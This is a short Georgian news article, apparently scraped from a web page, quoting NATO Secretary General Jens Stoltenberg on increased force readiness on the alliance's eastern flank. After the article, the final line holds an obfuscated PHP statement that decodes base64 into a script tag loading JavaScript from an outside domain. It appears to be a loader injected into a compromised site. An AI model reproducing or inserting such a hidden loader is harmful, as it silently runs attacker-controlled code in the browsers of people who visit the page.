celsiusi
ავერსი საქკაბელი
ნატოს გენერალური მდივანი, იენს სტოლტენბერგი აცხადებს, რომ ალიანსმა აღმოსავლეთ ფლანგზე ძალების მზადყოფნა გაზარდა.
 
მისი თქმით, ამჟამად, ნატოს დაქვემდებარებაში 40 ათასი ჯარისკაცია, რომლებიც უზრუნველყოფილნი არიან მნიშვნელოვანი საჰაერო და საზღვაო მხარდაჭერით.
 
როგორც სტოლტენბერგი აღნიშნავს, ამის მიზანი კონფლიქტის არიდება და მშვიდობის შენარჩუნებაა. 
 
"ისტორიაში პირველად, ჩვენ გადავისროლეთ საბრძოლო მზადყოფნაში მყოფი ძალები აღმოსავლეთ ფლანგზე, ჩვენ გავზარდეთ ჩვენი ძალების მზადყოფნა. როდესაც რუსეთი მიმდინარე წელს ისევ შეიჭრა უკრაინაში, ნატო მზად იყო. ჩვენ გადავისროლეთ დამატებით ძალები ალიანსის აღმოსავლეთით და ამჟამად ჩვენ გვაქვს 40 ათასი ჯარისკაცი უშუალოდ ნატო-ს დაქვემდებარებაში, რომლებიც უზრუნველყოფილნი არიან მნიშვნელოვანი საჰაერო და საზღვაო მხარდაჭერით. ჩვენ გავაორმაგეთ მრავალეროვანი საბრძოლო ჯგუფები ბალტიიდან შავ ზღვამდე და გვყავს 100 ათასი ჯარისკაცი მაღალი საბრძოლო მზადყოფნის ქვეშ, რომლებიც მზად არიან, რეაგირება მოახდინონ ნებისმიერ აგრესიაზე და დაიცვან ნატო-ს ტერიტორიის თითოეული სანტიმეტრი. ეს არის შეკავება, რათა აღმოიფხვრას ნებისმიერი გაუგებრობა. ეს არ არის კონფლიქტის პროვოცირებისთვის, არამედ არის მის ასარიდებლად და მშვიდობის შესანარჩუნებლად," - ამბობს იენს სტოლტენბერგი. 
618
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");